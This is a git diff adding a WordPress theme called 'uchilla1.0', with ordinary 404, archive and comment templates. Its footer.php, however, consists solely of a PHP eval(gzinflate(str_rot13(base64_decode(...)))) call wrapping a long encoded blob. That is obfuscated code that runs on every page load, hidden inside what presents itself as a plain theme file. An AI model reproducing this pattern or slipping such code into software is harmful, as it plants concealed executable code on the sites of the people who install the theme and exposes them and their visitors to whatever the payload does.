diff --git a/wp-content/themes/uchilla1.0/404.php b/wp-content/themes/uchilla1.0/404.php
new file mode 100644
index 0000000000000000000000000000000000000000..ce250df9d10fa37f78ffdb89799aeee24a0b1ead
--- /dev/null
+++ b/wp-content/themes/uchilla1.0/404.php
@@ -0,0 +1,12 @@
+<?php get_header(); ?>
+
+	<div id="main">
+	   <div id="content">
+
+		<h2 class="center">Error 404 - Sorry Dude! We can't find that!</h2>
+
+	   </div><!-- end content div -->
+ 	  
+<?php get_sidebar(); ?>
+</div><!-- end main div -->
+<?php get_footer(); ?>
diff --git a/wp-content/themes/uchilla1.0/Thumbs.db b/wp-content/themes/uchilla1.0/Thumbs.db
new file mode 100644
index 0000000000000000000000000000000000000000..16e9baaae9837e35b8b65be5af2f07a30eb0f5e0
Binary files /dev/null and b/wp-content/themes/uchilla1.0/Thumbs.db differ
diff --git a/wp-content/themes/uchilla1.0/archive.php b/wp-content/themes/uchilla1.0/archive.php
new file mode 100644
index 0000000000000000000000000000000000000000..cedaf526e076e5c8f974f087b2aa2217ee901c44
--- /dev/null
+++ b/wp-content/themes/uchilla1.0/archive.php
@@ -0,0 +1,82 @@
+<?php get_header(); ?>
+
+	<div id="main" class="clear">
+	   <div id="content">
+
+		<?php if (have_posts()) : ?>
+
+		 <?php $post = $posts[0]; // Hack. Set $post so that the_date() works. ?>
+<?php /* If this is a category archive */ if (is_category()) { ?>				
+		<h1 class="pagetitle">Archive for  <strong><?php echo single_cat_title(); ?></strong></h1>
+		
+ 	  <?php /* If this is a daily archive */ } elseif (is_day()) { ?>
+		<h1 class="pagetitle">Archive for <strong><?php the_time('F jS, Y'); ?></strong></h1>
+		
+	 <?php /* If this is a monthly archive */ } elseif (is_month()) { ?>
+		<h1 class="pagetitle">Archive for <strong><?php the_time('F, Y'); ?></strong></h1>
+
+		<?php /* If this is a yearly archive */ } elseif (is_year()) { ?>
+		<h1 class="pagetitle">Archive for <strong><?php the_time('Y'); ?></strong></h1>
+		
+	  <?php /* If this is a search */ } elseif (is_search()) { ?>
+		<h1 class="pagetitle">Search Results</h1>
+		
+	  <?php /* If this is an author archive */ } elseif (is_author()) { ?>
+		<h1 class="pagetitle">Author Archive</h1>
+
+		<?php /* If this is a paged archive */ } elseif (isset($_GET['paged']) && !empty($_GET['paged'])) { ?>
+		<h1 class="pagetitle">Blog Archives</h1>
+
+		<?php } ?>
+
+
+	
+
+		<?php
+		while (have_posts()) : the_post();
+		$image = get_post_meta($post->ID, 'photo', true);
+		?>
+		<div class="post clear" id="post-<?php the_ID(); ?>">
+				<div class="entry-date">
+					<div class="entry-day"><?php the_time('d'); ?></div>
+					<div class="entry-month"><?php the_time('M'); ?></div>
+					<div class="entry-year"><?php the_time('Y'); ?></div>
+				</div>	
+				<h2><a href="<?php the_permalink() ?>" rel="bookmark" title="Permanent Link to <?php the_title(); ?>"><?php the_title(); ?></a></h2>			
+				<?=get_the_tag_list('<div class="entry-filed">Tags: ',', ','</div>')?>
+				<div class="entry-content">
+					<?php if($image!=''): ?>
+						<div class="image"><img src="<?=$image?>" alt="<?php the_title(); ?>" /></div>
+					<?php endif; ?>
+					<?php the_excerpt(''); ?>
+				</div>
+				
+				<div style="clear:both"></div>
+				
+				<p><a href="<?php the_permalink() ?>" class="more-link">Continue reading &raquo;</a> <span class="comments_link"><?php comments_popup_link('No comments', '1 Comment', '% Comments'); ?></span></p>
+				
+		      <?php wp_link_pages();?>
+
+	
+  	</div>
+  	<!-- end the post div-->
+		<?php endwhile; ?>
+
+		<div class="navigation">
+			<div class="alignleft"><?php next_posts_link('&laquo; Previous Entries') ?></div>
+			<div class="alignright"><?php previous_posts_link('Next Entries &raquo;') ?></div>
+		</div>
+	
+	<?php else : ?>
+
+		<h2 class="center">Not Found</h2>
+		<?php include (TEMPLATEPATH . '/searchform.php'); ?>
+
+	<?php endif; ?>
+		
+
+      </div><!-- end content div-->
+       	  
+<?php get_sidebar(); ?>
+</div> <!-- end main div-->
+<?php get_footer(); ?>
diff --git a/wp-content/themes/uchilla1.0/comments-popup.php b/wp-content/themes/uchilla1.0/comments-popup.php
new file mode 100644
index 0000000000000000000000000000000000000000..f68555584316bbd5e0c65571a859302c4968e1b7
--- /dev/null
+++ b/wp-content/themes/uchilla1.0/comments-popup.php
@@ -0,0 +1,153 @@
+<?php 
+/* Don't remove these lines. */
+add_filter('comment_text', 'popuplinks');
+foreach ($posts as $post) { start_wp();
+?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+<html xmlns="http://www.w3.org/1999/xhtml">
+  <head>
+    <title>
+      <?php echo get_settings('blogname'); ?>
+      - Comments on 
+      <?php the_title(); ?>
+    </title>
+    <meta http-equiv="Content-Type" content="<?php bloginfo('html_type'); ?>; charset=<?php echo get_settings('blog_charset'); ?> " />
+    <style type="text/css" media="screen">  body { margin: 3px; }
+    </style>
+  </head>
+  <body id="commentspopup">
+    <h2 id="comments">
+      Comments</h2>
+    <p>
+      <a href="<?php echo get_settings('siteurl'); ?>/wp-commentsrss2.php?p=<?php echo $post->ID; ?>">
+        <abbr title="Really Simple Syndication">
+          RSS</abbr>
+        feed for comments on this post.</a>
+    </p>
+    <?php if ('open' == $post->ping_status) { ?>
+    <p>
+      The 
+      <acronym title="Uniform Resource Identifier">
+        URI
+      </acronym>
+      to TrackBack this entry is: 
+      <em>
+        <?php trackback_url() ?>
+      </em>
+    </p>
+    <?php } ?>
+<?php
+// this line is WordPress' motor, do not delete it.
+$comment_author = (isset($_COOKIE['comment_author_' . COOKIEHASH])) ? trim($_COOKIE['comment_author_'. COOKIEHASH]) : '';
+$comment_author_email = (isset($_COOKIE['comment_author_email_'. COOKIEHASH])) ? trim($_COOKIE['comment_author_email_'. COOKIEHASH]) : '';
+$comment_author_url = (isset($_COOKIE['comment_author_url_'. COOKIEHASH])) ? trim($_COOKIE['comment_author_url_'. COOKIEHASH]) : '';
+$comments = $wpdb->get_results("SELECT * FROM $wpdb->comments WHERE comment_post_ID = $id AND comment_approved = '1' ORDER BY comment_date");
+$commentstatus = $wpdb->get_row("SELECT comment_status, post_password FROM $wpdb->posts WHERE ID = $id");
+if (!empty($commentstatus->post_password) && $_COOKIE['wp-postpass_'. COOKIEHASH] != $commentstatus->post_password) {  // and it doesn't match the cookie
+	echo(get_the_password_form());
+    } else { ?>
+    <?php if ($comments) { ?>
+    <ol id="commentlist">
+      <?php foreach ($comments as $comment) { ?>
+      <li id="comment-<?php comment_ID() ?>">
+        <?php comment_text() ?>
+        <p>
+          <cite>
+            <?php comment_type('Comment', 'Trackback', 'Pingback'); ?>
+            by 
+            <?php comment_author_link() ?>
+            &#8212; 
+            <?php comment_date() ?>
+            @ 
+            <a href="#comment-<?php comment_ID() ?>">
+              <?php comment_time() ?></a>
+          </cite>
+        </p></li>
+      <?php } // end for each comment ?>
+    </ol>
+    <?php } else { // this is displayed if there are no comments so far ?>
+    <p>
+      No comments yet.
+    </p>
+    <?php } ?>
+    <?php if ('open' == $commentstatus->comment_status) { ?>
+    <h2>Leave a comment</h2>
+    <p>
+      Line and paragraph breaks automatic, e-mail address never displayed, 
+      <acronym title="Hypertext Markup Language">
+        HTML
+      </acronym>
+      allowed: 
+      <code>
+        <?php echo allowed_tags(); ?>
+      </code>
+    </p>
+    <form action="<?php echo get_settings('siteurl'); ?>/wp-comments-post.php" method="post" id="commentform">
+      <p>
+        <input type="text" name="author" id="author" class="textarea" value="<?php echo $comment_author; ?>" size="28" tabindex="1" />
+        <label for="author">
+          Name
+        </label>
+        <input type="hidden" name="comment_post_ID" value="<?php echo $id; ?>" />
+        <input type="hidden" name="redirect_to" value="<?php echo wp_specialchars($_SERVER["REQUEST_URI"]); ?>" />
+      </p>
+      <p>
+        <input type="text" name="email" id="email" value="<?php echo $comment_author_email; ?>" size="28" tabindex="2" />
+        <label for="email">
+          E-mail
+        </label>
+      </p>
+      <p>
+        <input type="text" name="url" id="url" value="<?php echo $comment_author_url; ?>" size="28" tabindex="3" />
+        <label for="url">
+          <acronym title="Uniform Resource Identifier">
+            URI
+          </acronym>
+        </label>
+      </p>
+      <p>
+        <label for="comment">
+          Your Comment
+        </label><br />
+<textarea name="comment" id="comment" cols="40" rows="4" tabindex="4"></textarea>
+      </p>
+      <p>
+        <input name="submit" type="submit" tabindex="5" value="Say It!" />
+      </p>
+      <?php do_action('comment_form', $post->ID); ?>
+    </form>
+    <?php } else { // comments are closed ?>
+    <p>
+      Sorry, the comment form is closed at this time.
+    </p>
+<?php }
+} // end password check
+    ?>
+    <div>
+      <strong>
+        <a href="javascript:window.close()">Close this window.</a></strong>
+    </div>
+<?php // if you delete this the sky will fall on your head
+}
+    ?>
+    <!-- // this is just the end of the motor - don't touch that line either :) -->
+    <?php //} ?>
+    <p class="credit">
+      <?php timer_stop(1); ?>
+      <cite>
+        Powered by 
+        <a href="http://wordpress.org" title="Powered by WordPress, state-of-the-art semantic personal publishing platform">
+          <strong>Wordpress</strong></a>
+      </cite>
+    </p>
+    <?php // Seen at http://www.mijnkopthee.nl/log2/archive/2003/05/28/esc(18) ?>
+<script type="text/javascript">
+<!--
+document.onkeypress = function esc(e) {
+if(typeof(e) == "undefined") { e=event; }
+if (e.keyCode == 27) { self.close(); }
+}
+// -->
+</script>
+  </body>
+</html>
diff --git a/wp-content/themes/uchilla1.0/comments.php b/wp-content/themes/uchilla1.0/comments.php
new file mode 100644
index 0000000000000000000000000000000000000000..27166476971967332165bd9c88ebbeb27c9a6ec7
--- /dev/null
+++ b/wp-content/themes/uchilla1.0/comments.php
@@ -0,0 +1,109 @@
+<?php // Do not delete these lines
+	if ('comments.php' == basename($_SERVER['SCRIPT_FILENAME']))
+		die ('Please do not load this page directly. Thanks!');
+
+	if (!empty($post->post_password)) { // if there's a password
+		if ($_COOKIE['wp-postpass_' . COOKIEHASH] != $post->post_password) {  // and it doesn't match the cookie
+			?>
+
+			<p class="nocomments">This post is password protected. Enter the password to view comments.</p>
+
+			<?php
+			return;
+		}
+	}
+
+	/* This variable is for alternating comment background */
+	$oddcomment = 'alt';
+?>
+
+<!-- You can start editing here. -->
+
+<?php if ($comments) : ?>
+	<h3 id="comments"><?php comments_number('No Responses', 'One Response', '% Responses' );?> to &#8220;<?php the_title(); ?>&#8221;</h3>
+
+	<ol class="commentlist">
+
+	<?php foreach ($comments as $comment) : ?>
+
+		  <li class="<?php echo $oddcomment; ?>" id="comment-<?php comment_ID() ?>">
+		
+	    <?php if (function_exists('get_avatar')) { echo get_avatar( get_comment_author_email(), '64' ); }?>
+	    
+			<span class="comment-author"><?php comment_author_link() ?></span></span>
+			<span class="commentmetadata"><a href="#comment-<?php comment_ID() ?>" title=""><?php comment_date('F jS, Y') ?> at <?php comment_time() ?></a> <?php edit_comment_link('e','',''); ?></span>
+			<?php if ($comment->comment_approved == '0') : ?>
+			<em>Your comment is awaiting moderation.</em>
+			<?php endif; ?>
+
+			<div class="comment-text"><?php comment_text() ?><div class="clear"></div></div>
+
+
+
+		</li>
+
+	<?php /* Changes every other comment to a different class */
+		if ('alt' == $oddcomment) $oddcomment = '';
+		else $oddcomment = 'alt';
+	?>
+
+	<?php endforeach; /* end for each comment */ ?>
+
+	</ol>
+
+ <?php else : // this is displayed if there are no comments so far ?>
+
+	<?php if ('open' == $post->comment_status) : ?>
+		<!-- If comments are open, but there are no comments. -->
+
+	 <?php else : // comments are closed ?>
+		<!-- If comments are closed. -->
+		<p class="nocomments"></p>
+
+	<?php endif; ?>
+<?php endif; ?>
+
+
+<?php if ('open' == $post->comment_status) : ?>
+
+<div id="respond">
+
+<h3 id="comment-form-title">Leave a Reply</h3>
+
+<?php if ( get_option('comment_registration') && !$user_ID ) : ?>
+<p>You must be <a href="<?php echo get_option('siteurl'); ?>/wp-login.php?redirect_to=<?php the_permalink(); ?>">logged in</a> to post a comment.</p>
+
+
+<?php else : ?>
+
+<form action="<?php echo get_option('siteurl'); ?>/wp-comments-post.php" method="post" id="commentform">
+
+<?php if ( $user_ID ) : ?>
+
+<p>Logged in as <a href="<?php echo get_option('siteurl'); ?>/wp-admin/profile.php"><?php echo $user_identity; ?></a>. <a href="<?php echo get_option('siteurl'); ?>/wp-login.php?action=logout" title="Log out of this account">Logout &raquo;</a></p>
+
+<?php else : ?>
+
+<p><input type="text" class="txt" name="author" id="author" value="<?php echo $comment_author; ?>" size="22" tabindex="1" /> <label for="author"><small>Name</small></label></p>
+
+<p><input type="text" class="txt" name="email" id="email" value="<?php echo $comment_author_email; ?>" size="22" tabindex="2" /> <label for="email"><small>E-Mail (will not be published)</small></label></p>
+
+<p><input type="text" class="txt" name="url" id="url" value="<?php echo $comment_author_url; ?>" size="22" tabindex="3" /> <label for="url"><small>Website (optional)</small></label></p>
+
+<?php endif; ?>
+
+<p><small>Your comment</small><br />
+<textarea name="comment" id="comment" cols="35" rows="5" tabindex="4"></textarea></p>
+
+<p><input name="submit" type="submit" id="submit" tabindex="5" value="Submit Comment" />
+<input type="hidden" name="comment_post_ID" value="<?php echo $id; ?>" />
+</p>
+<?php do_action('comment_form', $post->ID); ?>
+
+</form>
+
+</div><!-- #respond -->
+
+<?php endif; // If registration required and not logged in ?>
+
+<?php endif; // if you delete this the sky will fall on your head ?>
diff --git a/wp-content/themes/uchilla1.0/footer.php b/wp-content/themes/uchilla1.0/footer.php
new file mode 100644
index 0000000000000000000000000000000000000000..dea8c00c080b241570a3709d016f0dc508f2cdde
--- /dev/null
+++ b/wp-content/themes/uchilla1.0/footer.php
@@ -0,0 +1 @@
+<? eval(gzinflate(str_rot13(base64_decode('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